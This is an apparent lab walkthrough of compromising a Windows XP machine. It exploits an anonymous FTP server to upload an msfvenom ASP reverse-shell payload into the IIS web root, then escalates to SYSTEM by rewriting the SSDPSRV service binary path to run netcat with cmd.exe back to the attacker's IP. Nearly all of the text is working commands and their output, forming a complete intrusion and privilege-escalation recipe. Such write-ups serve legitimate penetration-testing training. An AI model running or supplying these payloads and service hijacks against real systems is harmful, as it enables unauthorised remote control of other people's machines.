weak service permissions

lab environment:


  • Target : 192.168.178.25
  • Attack pc: Windows 10 (192.168.178.15) and some kali for msfvenom

Infiltration process:

The IP of the target drone we selected today is 192.168.178.14. , still nmap port detection.

root@kali:~# nmap -sS -sV -p 1-1024 -Pn 192.168.178.25
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-26 14:21 EDT
Nmap scan report for 192.168.178.25
Host is up (0.00028s latency).
Not shown: 1017 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
25/tcp open smtp Microsoft ESMTP 6.0.2600.5949
80/tcp open http Microsoft IIS httpd 5.1
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open https?
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:7F:DA:07 (Oracle VirtualBox virtual NIC)
Service Info: Host: xppro; OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.12 seconds

Analysis of the scan results, the target target machine exists ftp service and IIS5.1 service.

First check if ftp exists for anonymous login.

C:\Users\jacco>ftp 192.168.178.25
Connected to 192.168.178.25.
220-Microsoft FTP Service
220 Welcome to MS FTP
500 'OPTS UTF8 ON': command not understood
User (192.168.178.25:(none)): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 Anonymous user logged in.
ftp> ls -la
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
06-26-19 06:42PM 325432 accesschk_xp.exe
06-26-19 07:23PM <DIR> AdminScripts
06-26-19 07:23PM <DIR> ftproot
05-27-19 11:04AM <DIR> iissamples
06-26-19 06:46PM 9068 log.txt
05-27-19 11:04AM <DIR> mailroot
06-26-19 07:16PM 28160 nc.exe
05-27-19 11:04AM <DIR> Scripts
06-26-19 06:42PM 66560 whoami.exe
05-27-19 11:37AM <DIR> wwwroot
226 Transfer complete.
ftp: 503 bytes received in 0.02Seconds 25.15Kbytes/sec.
ftp>

Sure enough, there is an ftp anonymous login problem and there is a IIS wwwroot directory. Such an idea naturally appears, upload the webshell to the wwwroot directory, which is detailed here.

root@kali:~/pwk# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.178.15 LPORT=4444 EXITFUNC=thread -f asp --arch x86 --platform win > xpvbsshell.asp
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of asp file: 38138 bytes

Upload xpvbsshell.asp by ftp

c:\PENTEST>ftp 192.168.178.25
Connected to 192.168.178.25.
220-Microsoft FTP Service
220 Welcome to MS FTP
500 'OPTS UTF8 ON': command not understood
User (192.168.178.25:(none)): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 Anonymous user logged in.
ftp> cd wwwroot
250 CWD command successful.
ftp> bin
200 Type set to I.
ftp> put xpvbsshell.asp
200 PORT command successful.
150 Opening BINARY mode data connection for xpvbsshell.asp.
226 Transfer complete.
ftp: 38138 bytes sent in 0.00Seconds 38138000.00Kbytes/sec.

Trigger the uploaded page

C:\Users\jacco>curl http://192.168.178.25/xpvbsshell.asp

Wait for Incoming

c:\Users\jacco>nc -lvp 4444
listening on [any] 4444 ...
192.168.178.25: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [192.168.178.15] from (UNKNOWN) [192.168.178.25] 1051: NO_DATA
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>cd c:\inetpub
cd c:\inetpub

C:\Inetpub>whoami
whoami
XPPRO\IWAM_XPPRO

C:\Inetpub>

 

Next, of course, the problem to be considered is to raise the power. Generally, there are several ways to raise rights:

  1. Use the system’s own service or the system’s own privilege escalation vulnerability, such as: MS16-016 (CVE-2016-0051)
  2. Use a secure third-party software vulnerability to escalate rights, such as: MYSQL (CVE-2016-6662/6663)
  3. There is another one that is easily overlooked by everyone, that is, using the permissions of incorrect files and services.

In this case, I will mainly demonstrate the third method of lifting rights. Before we start lifting our rights, we need to use 2 gadgets:

  1. Icacls (for win7 and above) / cacls (for winxp and win2000 systems) – system default tool for checking the permissions configuration information of a specific folder or file
  2. Accesschk (one of the sysinternals toolset) – used to check the permissions of a specific user or group for files, directories, registry, global objects, and windows services

With these two useful tools, we can try to improve the power.

First, enter the shell, view the system directory, and find the path to the IIS web directory: C:\Inetpub\wwwroot\

Next, upload our tools like ; accesschk, netcat.

Execute accesschk-xp.exe to check the current user has write access to the windows service, because these services are configured with too high permissions will help us to achieve the authorization operation.

C:\Inetpub>accesschk_xp.exe /accepteula -uwcqv * | more

Alerter
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS
ALG
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS
AppMgmt
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS
AudioSrv
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS
BITS
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS

-- snip --

SSDPSRV
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS
  RW S-1-5-32-549
        SERVICE_ALL_ACCESS
upnphost
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS
  RW S-1-5-32-549
        SERVICE_ALL_ACCESS
  RW NT AUTHORITY\LOCAL SERVICE
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_CHANGE_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_USER_DEFINED_CONTROL
        READ_CONTROL

Obviously, we found 2 windows services that meet the conditions, SSDPSRV and upnphost. Feel free to choose a service to check, such as: SSDPSRV

C:\Inetpub>accesschk_xp.exe /accepteula -uwcqv SSDPSRV
SSDPSRV
RW NT AUTHORITY\SYSTEM
SERVICE_ALL_ACCESS
RW BUILTIN\Administrators
SERVICE_ALL_ACCESS
RW S-1-5-32-549
SERVICE_ALL_ACCESS

A simple analysis of this service, we can find that this service can use the NT AUTHORITY\SYSTEM permission to start our specified binary file, which means that we can use the SYSTEM permission to bounce a shell and then complete the escalation operation, the specific operation commands are as follows:

C:\Inetpub>sc qc SSDPSRV
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: SSDPSRV
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\WINDOWS\system32\svchost.exe -k LocalService
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : SSDP Discovery Service
DEPENDENCIES : HTTP
SERVICE_START_NAME : NT AUTHORITY\LocalService

C:\Inetpub>
C:\Inetpub>sc config SSDPSRV binpath= "c:\inetpub\nc.exe -nv 192.168.178.15 9090
-e cmd.exe
[SC] ChangeServiceConfig SUCCESS

C:\Inetpub>
C:\Inetpub>sc config SSDPSRV obj= ".\LocalSystem" password= ""
[SC] ChangeServiceConfig SUCCESS

C:\Inetpub>
C:\Inetpub>sc config SSDPSRV start= "demand"
[SC] ChangeServiceConfig SUCCESS
C:\Inetpub>sc qc SSDPSRV
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: SSDPSRV
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : c:\inetpub\nc.exe -nv 192.168.178.15 9090 -e cmd.ex
e
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : SSDP Discovery Service
DEPENDENCIES : HTTP
SERVICE_START_NAME : LocalSystem

At this point, we have configured the SSDPSRV service to use the SYSTEM privilege to execute the nc bounce shell service.

Re-open a listening window directly on the attacker (192.168.178.15), as follows:

c:\Users\jacco>nc -lvp 9090
listening on [any] 9090 ...

Start the SSDPSRV service on the target drone (192.168.178.25).

C:\Inetpub>net start SSDPSRV

Finally, we successfully bounced back a shell with a SYSTEM privilege.

c:\Users\jacco>nc -lvp 9090
listening on [any] 9090 ...
192.168.178.25: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [192.168.178.15] from (UNKNOWN) [192.168.178.25] 1105: NO_DATA
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>\\10.11.0.112\puck\whoami.exe
\\10.11.0.112\puck\whoami.exe
NT AUTHORITY\SYSTEM

Summary

Summarize the penetration process of this case:

  1. Nmap for port detection
  2. Analyze vulnerability services and leverage
  3. Get a shell and check for unsafe windows services
  4. Configure the windows service to execute the bounce shell with SYSTEM privileges.
  5. Open the windows service to get the SYSTEM permission shell